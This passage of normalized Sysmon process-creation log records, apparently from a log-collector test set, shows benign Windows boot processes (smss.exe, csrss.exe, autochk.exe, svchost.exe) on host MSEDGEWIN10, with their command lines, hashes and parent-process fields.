Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"smss.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000d8 00000084 \"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=5B61A25931437D4210EE3CBC8AE3A337B62F3DF0,MD5=38E6700BAA0E5484D2E00EC980FDD2E0,SHA256=B6E357B520478920810317B363AA539595D386BC5EF3D5CF9581F325026BA397,IMPHASH=BC32B6662261DE8469D6EB034C62A6A5\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b75f-5ea4-0000-0010622c0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"300\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\\SystemRoot\\System32\\smss.exe 000000d8 00000084", "object.process.cwd": "C:\\Windows\\", "object.process.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.guid": "747f3d96-b764-5ea4-0000-0010794d0000", "object.process.hash.imphash": "BC32B6662261DE8469D6EB034C62A6A5", "object.process.hash.md5": "38E6700BAA0E5484D2E00EC980FDD2E0", "object.process.hash.sha1": "5B61A25931437D4210EE3CBC8AE3A337B62F3DF0", "object.process.hash.sha256": "B6E357B520478920810317B363AA539595D386BC5EF3D5CF9581F325026BA397", "object.process.id": "460", "object.process.meta": "Description:Windows Session Manager | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "smss.exe", "object.process.original_name": "smss.exe", "object.process.parent.cmdline": "\\SystemRoot\\System32\\smss.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.parent.guid": "747f3d96-b75f-5ea4-0000-0010622c0000", "object.process.parent.id": "300", "object.process.parent.name": "smss.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1131 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:16.128Z", "type": "raw", "uuid": "b510dd28-f5b7-4af7-a8f9-e8974ef379fc"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:22.6308195Z\"},\"EventRecordID\":\"27377\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:15.990\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b763-5ea4-0000-001034490000}\"},{\"Name\":\"ProcessId\",\"text\":\"396\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\csrss.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Client Server Runtime Process\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"CSRSS.Exe\"},{\"Name\":\"CommandLine\",\"text\":\"%%SystemRoot%%\\\\system32\\\\csrss.exe ObjectDirectory=\\\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=779B8AFC3FA2528B090F400EF3D592E0E2775955,MD5=7D64128BC1EECE41196858897596EBC8,SHA256=FB40ED0FFA6BC795923A941DAB6B7D6B43583D0F152A6DF4D8953D2C1A0CB417,IMPHASH=A96FA9912E09E361274AD77F1A4B252C\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b763-5ea4-0000-00106a480000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"388\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000cc 00000084 \"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "%%SystemRoot%%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\csrss.exe", "object.process.guid": "747f3d96-b763-5ea4-0000-001034490000", "object.process.hash.imphash": "A96FA9912E09E361274AD77F1A4B252C", "object.process.hash.md5": "7D64128BC1EECE41196858897596EBC8", "object.process.hash.sha1": "779B8AFC3FA2528B090F400EF3D592E0E2775955", "object.process.hash.sha256": "FB40ED0FFA6BC795923A941DAB6B7D6B43583D0F152A6DF4D8953D2C1A0CB417", "object.process.id": "396", "object.process.meta": "Description:Client Server Runtime Process | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "csrss.exe", "object.process.original_name": "CSRSS.Exe", "object.process.parent.cmdline": "\\SystemRoot\\System32\\smss.exe 000000cc 00000084", "object.process.parent.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.parent.guid": "747f3d96-b763-5ea4-0000-00106a480000", "object.process.parent.id": "388", "object.process.parent.name": "smss.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:15.990Z", "type": "raw", "uuid": "f8e8a5e5-22d3-4fba-aade-300688a9c827"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:22.5963525Z\"},\"EventRecordID\":\"27374\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:15.727\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b763-5ea4-0000-00106a480000}\"},{\"Name\":\"ProcessId\",\"text\":\"388\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1131 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Session Manager\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"smss.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000cc 00000084 \"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=5B61A25931437D4210EE3CBC8AE3A337B62F3DF0,MD5=38E6700BAA0E5484D2E00EC980FDD2E0,SHA256=B6E357B520478920810317B363AA539595D386BC5EF3D5CF9581F325026BA397,IMPHASH=BC32B6662261DE8469D6EB034C62A6A5\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b75f-5ea4-0000-0010622c0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"300\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\\SystemRoot\\System32\\smss.exe 000000cc 00000084", "object.process.cwd": "C:\\Windows\\", "object.process.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.guid": "747f3d96-b763-5ea4-0000-00106a480000", "object.process.hash.imphash": "BC32B6662261DE8469D6EB034C62A6A5", "object.process.hash.md5": "38E6700BAA0E5484D2E00EC980FDD2E0", "object.process.hash.sha1": "5B61A25931437D4210EE3CBC8AE3A337B62F3DF0", "object.process.hash.sha256": "B6E357B520478920810317B363AA539595D386BC5EF3D5CF9581F325026BA397", "object.process.id": "388", "object.process.meta": "Description:Windows Session Manager | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "smss.exe", "object.process.original_name": "smss.exe", "object.process.parent.cmdline": "\\SystemRoot\\System32\\smss.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.parent.guid": "747f3d96-b75f-5ea4-0000-0010622c0000", "object.process.parent.id": "300", "object.process.parent.name": "smss.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1131 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.505Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:15.727Z", "type": "raw", "uuid": "00dc34fa-0bb8-4eab-a156-1aba61290441"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:22.3127414Z\"},\"EventRecordID\":\"27373\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:14.321\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b762-5ea4-0000-00108b3c0000}\"},{\"Name\":\"ProcessId\",\"text\":\"328\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\autochk.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Auto Check Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"AutoChk.Exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\autochk.exe *\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=2E6C38958917FB86F09026D41337C7460EFBE5F5,MD5=990D01F2A6D10A33C382191A24BBAAAF,SHA256=644417B839762A3325920A87C3D955CA974A4EC1D6F008216910267435921255,IMPHASH=262DAC4DB20D08B06C59A7F5DBE43E61\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b75f-5ea4-0000-0010622c0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"300\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\\??\\C:\\Windows\\system32\\autochk.exe *", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\autochk.exe", "object.process.guid": "747f3d96-b762-5ea4-0000-00108b3c0000", "object.process.hash.imphash": "262DAC4DB20D08B06C59A7F5DBE43E61", "object.process.hash.md5": "990D01F2A6D10A33C382191A24BBAAAF", "object.process.hash.sha1": "2E6C38958917FB86F09026D41337C7460EFBE5F5", "object.process.hash.sha256": "644417B839762A3325920A87C3D955CA974A4EC1D6F008216910267435921255", "object.process.id": "328", "object.process.meta": "Description:Auto Check Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "autochk.exe", "object.process.original_name": "AutoChk.Exe", "object.process.parent.cmdline": "\\SystemRoot\\System32\\smss.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.parent.guid": "747f3d96-b75f-5ea4-0000-0010622c0000", "object.process.parent.id": "300", "object.process.parent.name": "smss.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.505Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:14.321Z", "type": "raw", "uuid": "27343a77-5820-42f9-b0e2-fec9534fd272"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:20.1345606Z\"},\"EventRecordID\":\"27372\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:11.037\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b75f-5ea4-0000-0010622c0000}\"},{\"Name\":\"ProcessId\",\"text\":\"300\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\smss.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1131 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Session Manager\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"smss.exe\"},{\"Name\":\"CommandLine\",\"text\":\"\\\\SystemRoot\\\\System32\\\\smss.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=5B61A25931437D4210EE3CBC8AE3A337B62F3DF0,MD5=38E6700BAA0E5484D2E00EC980FDD2E0,SHA256=B6E357B520478920810317B363AA539595D386BC5EF3D5CF9581F325026BA397,IMPHASH=BC32B6662261DE8469D6EB034C62A6A5\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b75f-5ea4-0000-0010eb030000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4\"},{\"Name\":\"ParentImage\",\"text\":\"System\"},{\"Name\":\"ParentCommandLine\",\"text\":\"?\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\\SystemRoot\\System32\\smss.exe", "object.process.cwd": "C:\\Windows", "object.process.fullpath": "c:\\windows\\system32\\smss.exe", "object.process.guid": "747f3d96-b75f-5ea4-0000-0010622c0000", "object.process.hash.imphash": "BC32B6662261DE8469D6EB034C62A6A5", "object.process.hash.md5": "38E6700BAA0E5484D2E00EC980FDD2E0", "object.process.hash.sha1": "5B61A25931437D4210EE3CBC8AE3A337B62F3DF0", "object.process.hash.sha256": "B6E357B520478920810317B363AA539595D386BC5EF3D5CF9581F325026BA397", "object.process.id": "300", "object.process.meta": "Description:Windows Session Manager | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "smss.exe", "object.process.original_name": "smss.exe", "object.process.parent.cmdline": "?", "object.process.parent.fullpath": "system", "object.process.parent.guid": "747f3d96-b75f-5ea4-0000-0010eb030000", "object.process.parent.id": "4", "object.process.parent.name": "system", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1131 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.505Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:11.037Z", "type": "raw", "uuid": "a48bd392-d33d-46d2-b6db-1ec152ae9b00"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:02.0572010Z\"},\"EventRecordID\":\"27334\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2752\",\"ThreadID\":\"3576\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:01.724\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b755-5ea4-0000-0010d06e2500}\"},{\"Name\":\"ProcessId\",\"text\":\"4484\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s gpsvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-3384-5ea5-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"596\"},{\"Name\":\"ParentImage\",\"text\":\"?\"},{\"Name\":\"ParentCommandLine\",\"text\":\"?\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-3384-5ea5-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b755-5ea4-0000-0010d06e2500", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "4484", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "?", "object.process.parent.fullpath": "?", "object.process.parent.guid": "00000000-0000-0000-0000-000000000000", "object.process.parent.id": "596", "object.process.parent.name": "?", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.505Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", 